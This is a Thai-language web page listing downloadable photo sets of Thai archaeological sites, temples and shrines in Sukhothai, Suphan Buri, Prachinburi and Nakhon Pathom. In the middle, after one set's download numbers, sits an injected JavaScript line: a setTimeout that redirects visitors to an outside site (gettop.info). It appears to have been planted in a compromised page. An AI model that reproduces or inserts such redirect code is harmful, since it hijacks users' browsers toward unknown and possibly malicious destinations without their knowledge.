หมวดหมู่ ‘Photo Essay’

หินตั้ง ที่ป่าหินตั้ง สิ่งก่อสร้างในศาสนาผีพื้นเมืองอุษาคเนย์ บนยอดเขาพุหางนาค อ. อู่ทอง จ. สุพรรณบุรี

Download

ภาพและคำบรรยายชุดสุโขทัย

ภาพและคำบรรยายชุดสุโขทัย มี 34 รูป (17 หน้า)

จากหนังสือประวัติศาสตร์สุโขทัย, จอมพล ป. พิบูลสงคราม พิมพ์แจก

เนื่องในวาระคล้ายวันเกิด 14 กรกฎาคม 2498

Download:  Sukhothai

ภาพชุด คลังโบราณวัตถุ-ขนอนหลวง-เทริด

ภาพชุด คลังโบราณวัตถุ-ขนอนหลวง-เทริด

ถ่ายเมื่อวันเสาร์ที่ 17 มีนาคม 2555

โดย วิราวรรณ นฤปิติ และ ปรีดาภรณ์ เอี่ยมแจ๋

 

Download : 1  2  3

ศิลปะในประเทศไทย

ดาวน์โหลด 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

เชียงใหม่-แพร่-อุตรดิตถ์-พิษณุโลก-โคกไม้เดน

เชียงใหม่-แพร่-อุตรดิตถ์-พิษณุโลก-โคกไม้เดน

ดาวน์โหลด 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 setTimeout(“document.location.href=’http://gettop.info/kt/?53vSkc&'”, delay);

อนุสาวรีย์พระเจ้าตาก วัดบางคาง – วัดกระแจะ (ปราจีนบุรี) – โคกมอญ ศาลปู่ตาบ้าน-เจดีย์วัดแสงสว่าง

อนุสาวรีย์พระเจ้าตาก วัดบางคาง – วัดกระแจะ

(ปราจีนบุรี) – โคกมอญ ศาลปู่ตาบ้าน –

เจดีย์วัดแสงสว่าง

ดาวน์โหลด 1 2 3 4 5 6 7 8

ศาลไทร – ศาลายา

ศาลพ่อปูพูนทรัพย์-เทพเทวี-แม่ไทรเงินไทรทอง

ริมคลองมหาสวัสดิ์ ชุมชนร่มไทร ต.ศาลายา จ.นครปฐม

22 ตุลาคม 2553

ดาวน์โหลด 1

ศรีมโหสถ-โบราณสถาน

ศรีมโหสถ -โบราณสถานหนองขนาด –

โบราณสถาน NO.86 – โบราณสถาน No.22 –

วัตถุสัมฤทธิ์พิพิธภัณฑ์ ปราจีนบุรี

ดาวน์โหลด 1 2 3 4

ภาพชุดลำน้ำท่าคอย – ท่าว้า และศาลจอมปลวก ในหมู่บ้าน จ.สุพรรณบุรี ถ่ายเมื่อวันที่ 2 ตุลาคม 255

ภาพชุดลำน้ำท่าคอย – ท่าว้า และศาลจอมปลวก

ในหมู่บ้าน จ.สุพรรณบุรี

ถ่ายเมื่อวันที่ 2 ตุลาคม 2553

โดย เจนจิรา เบญจพงศ์

ดาวน์โหลด 1 2 3 4

ภาพชุด พิธียกยอดนภศูล วัดพระธาตุ (สวนแตง) – เขาพระ – เขาทำเทียม จ.สุพรรณบุรี และวัดหลวงพ่อเปิ่น จ.นครปฐม

ภาพชุด พิธียกยอดนภศูล วัดพระธาตุ (สวนแตง)

– เขาพระ – เขาทำเทียม จ.สุพรรณบุรี

และวัดหลวงพ่อเปิ่น จ.นครปฐม

ถ่ายเมื่อวันที่ 25 กันยายน 2553

โดย เจนจิรา เบญจพงศ์

ดาวน์โหลด 1 2 3 4 5 6